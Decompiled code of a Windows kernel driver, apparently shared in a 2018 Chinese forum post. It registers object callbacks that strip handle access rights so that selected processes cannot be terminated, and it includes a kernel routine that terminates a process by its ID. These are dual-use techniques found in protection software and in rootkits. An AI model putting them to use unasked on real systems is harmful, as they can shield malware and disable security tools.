int __stdcall ProcessCallBack(int a1, int a2)
{
int v2; // ST04_4
v2 = PsGetProcessId(*(_DWORD *)(a2 + 8));
if ( sub_401F30(v2) && *(_DWORD *)a2 == 1 )
{
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 1 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFFE;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 4 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFFB;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 8 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFF7;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x10 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFEF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x20 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFDF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x100 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFEFF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x200 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFDFF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x400 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFBFF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x800 )
**(_DWORD **)(a2 + 20) &= 0xFFFFF7FF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x1000 )
**(_DWORD **)(a2 + 20) &= 0xFFFFEFFF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x2000 )
**(_DWORD **)(a2 + 20) &= 0xFFFFDFFF;
}
return 0;
}
// 402060: using guessed type int __stdcall ProcessCallBack(int, int);
// 403090: using guessed type int __stdcall PsGetProcessId(_DWORD);
//----- (00402230) --------------------------------------------------------
int RegisterProcessCallbacks()
{
int v1; // [esp+0h] [ebp-24h]
LSA_UNICODE_STRING DestinationString; // [esp+4h] [ebp-20h]
int v3; // [esp+Ch] [ebp-18h]
int *v4; // [esp+10h] [ebp-14h]
int v5; // [esp+14h] [ebp-10h]
int v6; // [esp+18h] [ebp-Ch]
int (__stdcall *v7)(int, int); // [esp+1Ch] [ebp-8h]
int v8; // [esp+20h] [ebp-4h]
LOWORD(v1) = ObGetFilterVersion(0, 0, 0, 0, 0);
HIWORD(v1) = 1;
v3 = 0;
RtlInitUnicodeString(&DestinationString, L"321000");
v8 = 0;
v5 = PsProcessType;
v6 = 3;
v7 = ProcessCallBack;
v4 = &v5;
return ObRegisterCallbacks(&v1, &dword_4041AC);
}
// 402060: using guessed type int __stdcall ProcessCallBack(int, int);
// 403070: using guessed type int __stdcall ObRegisterCallbacks(_DWORD, _DWORD);
// 403078: using guessed type int __cdecl ObGetFilterVersion(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 4041AC: using guessed type int dword_4041AC;
//----- (004022B0) --------------------------------------------------------
int RegisterThreadCallbacks()
{
int v1; // [esp+0h] [ebp-24h]
LSA_UNICODE_STRING DestinationString; // [esp+4h] [ebp-20h]
int v3; // [esp+Ch] [ebp-18h]
int *v4; // [esp+10h] [ebp-14h]
int v5; // [esp+14h] [ebp-10h]
int v6; // [esp+18h] [ebp-Ch]
int (__stdcall *v7)(int, int); // [esp+1Ch] [ebp-8h]
int v8; // [esp+20h] [ebp-4h]
LOWORD(v1) = ObGetFilterVersion(0, 0, 0, 0, 0);
HIWORD(v1) = 1;
v3 = 0;
RtlInitUnicodeString(&DestinationString, L"321000");
v8 = 0;
v5 = PsThreadType;
v6 = 3;
v7 = ThreadCallback;
v4 = &v5;
return ObRegisterCallbacks(&v1, &dword_4041B0);
}
// 4024F0: using guessed type int __stdcall ThreadCallback(int, int);
// 403070: using guessed type int __stdcall ObRegisterCallbacks(_DWORD, _DWORD);
// 403078: using guessed type int __cdecl ObGetFilterVersion(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 4041B0: using guessed type int dword_4041B0;
//----- (00402330) --------------------------------------------------------
int __stdcall sub_402330(int a1, PUNICODE_STRING LinkTarget)
{
int result; // eax
struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+0h] [ebp-20h]
HANDLE LinkHandle; // [esp+18h] [ebp-8h]
NTSTATUS v5; // [esp+1Ch] [ebp-4h]
ObjectAttributes.Length = 24;
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.Attributes = 64;
ObjectAttributes.ObjectName = (PUNICODE_STRING)a1;
ObjectAttributes.SecurityDescriptor = 0;
ObjectAttributes.SecurityQualityOfService = 0;
v5 = ZwOpenSymbolicLinkObject(&LinkHandle, 0x80000000, &ObjectAttributes);
if ( v5 < 0 )
return v5;
LinkTarget->MaximumLength = 2048;
LinkTarget->Length = 0;
LinkTarget->Buffer = (PWSTR)ExAllocatePoolWithTag(PagedPool, LinkTarget->MaximumLength, 0x4130u);
if ( LinkTarget->Buffer )
{
memset(LinkTarget->Buffer, 0, LinkTarget->MaximumLength);
v5 = ZwQuerySymbolicLinkObject(LinkHandle, LinkTarget, 0);
ZwClose(LinkHandle);
if ( v5 < 0 )
ExFreePoolWithTag(LinkTarget->Buffer, 0);
result = v5;
}
else
{
ZwClose(LinkHandle);
result = -1073741670;
}
return result;
}
//----- (00402420) --------------------------------------------------------
int __stdcall sub_402420(int a1, PIRP Irp, int a3)
{
Irp->UserIosb->Status = Irp->IoStatus.Status;
Irp->UserIosb->Information = Irp->IoStatus.Information;
KeSetEvent(Irp->UserEvent, 0, 0);
IoFreeIrp(Irp);
return -1073741802;
}
//----- (00402470) --------------------------------------------------------
NTSTATUS __stdcall TerminateProcessById(void *a1)
{
NTSTATUS result; // eax
struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+0h] [ebp-24h]
struct _CLIENT_ID ClientId; // [esp+18h] [ebp-Ch]
HANDLE ProcessHandle; // [esp+20h] [ebp-4h]
ProcessHandle = 0;
ClientId.UniqueProcess = a1;
ClientId.UniqueThread = 0;
ObjectAttributes.Length = 24;
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.ObjectName = 0;
ObjectAttributes.Attributes = 0;
ObjectAttributes.SecurityDescriptor = 0;
ObjectAttributes.SecurityQualityOfService = 0;
result = ZwOpenProcess(&ProcessHandle, 1u, &ObjectAttributes, &ClientId);
if ( ProcessHandle )
{
ZwTerminateProcess(ProcessHandle, 0);
result = ZwClose(ProcessHandle);
}
return result;
}
//----- (004024F0) --------------------------------------------------------
int __stdcall ThreadCallback(int a1, int a2)
{
int v2; // ST04_4
v2 = PsGetProcessId(*(_DWORD *)(a2 + 8));
if ( sub_401F30(v2) && *(_DWORD *)a2 == 1 )
{
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 1 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFFE;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 2 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFFD;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x80 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFF7F;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x400 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFBFF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x20 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFDF;
if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x10 )
**(_DWORD **)(a2 + 20) &= 0xFFFFFFEF;
}
return 0;
}
// 4024F0: using guessed type int __stdcall ThreadCallback(int, int);
// 403090: using guessed type int __stdcall PsGetProcessId(_DWORD);
//----- (00402600) --------------------------------------------------------
int __stdcall IogetcurrentIrpstacklocation(int a1)
{
if ( *(char *)(a1 + 35) > *(char *)(a1 + 34) + 1 )
__int2c();
return *(_DWORD *)(a1 + 96);
}
//----- (00402640) --------------------------------------------------------
int __stdcall sub_402640(int a1)
{
if ( *(char *)(a1 + 35) <= 0 )
__int2c();
return *(_DWORD *)(a1 + 96) - 36;
}
//----- (00402670) --------------------------------------------------------
int __stdcall sub_402670(int a1, int a2, int a3, char a4, unsigned __int8 a5, char a6)
{
int result; // eax
BOOL v7; // [esp+4h] [ebp-Ch]
int v8; // [esp+Ch] [ebp-4h]
if ( a4 || a5 || a6 )
v7 = a2 != 0;
else
v7 = 1;
if ( !v7 )
__int2c();
v8 = sub_402640(a1);
*(_DWORD *)(v8 + 28) = a2;
*(_DWORD *)(v8 + 32) = a3;
*(_BYTE *)(v8 + 3) = 0;
if ( a4 )
*(_BYTE *)(v8 + 3) = 64;
result = a5;
if ( a5 )
{
result = v8;
*(_BYTE *)(v8 + 3) |= 0x80u;
}
if ( a6 )
{
result = *(unsigned __int8 *)(v8 + 3) | 0x20;
*(_BYTE *)(v8 + 3) = result;
}
return result;
}
//----- (00402998) --------------------------------------------------------
signed int __cdecl sub_402998(int a1, unsigned int a2, int a3, unsigned int *a4)
{
signed int result; // eax
int v5; // ecx
int v6; // ebp
result = 1;
if ( *(_DWORD *)(a1 + 4) & 6 )
{
v5 = a2 ^ *(_DWORD *)(a2 + 8);
v6 = *(_DWORD *)(a2 + 24);
sub_402908(*(_DWORD *)(a2 + 20), *(_DWORD *)(a2 + 16), *(_DWORD *)(a2 + 12));
*a4 = a2;
result = 3;
}
return result;
}
// 402908: using guessed type _DWORD __cdecl sub_402908(_DWORD, _DWORD, _DWORD);
//----- (004029FC) --------------------------------------------------------
int __thiscall sub_4029FC(int (__fastcall *this)(_DWORD, _DWORD))
{
return this(this, 0);
}
//----- (00402A14) --------------------------------------------------------
int __thiscall sub_402A14(int (__fastcall *this)(_DWORD, _DWORD))
{
int (__fastcall *v1)(_DWORD, _DWORD); // esi
v1 = this;
_NLG_Notify(1);
return v1(0, 0);
}
// 402A6D: using guessed type _DWORD __stdcall _NLG_Notify(_DWORD);
//----- (00402A30) --------------------------------------------------------
void __thiscall sub_402A30(PVOID TargetFrame)
{
RtlUnwind(TargetFrame, &loc_402A45, 0, 0);
}
//----- (00402A4C) --------------------------------------------------------
int __fastcall sub_402A4C(int a1, int a2, int a3, int a4)
{
return sub_402908(a4, a1, a2);
}
// 402908: using guessed type _DWORD __cdecl sub_402908(_DWORD, _DWORD, _DWORD);
// ALL OK, 33 function(s) have been successfully decompiled
|
楼主: TheYuCheng
[复制链接]
发表于 2018-3-22 14:46:00
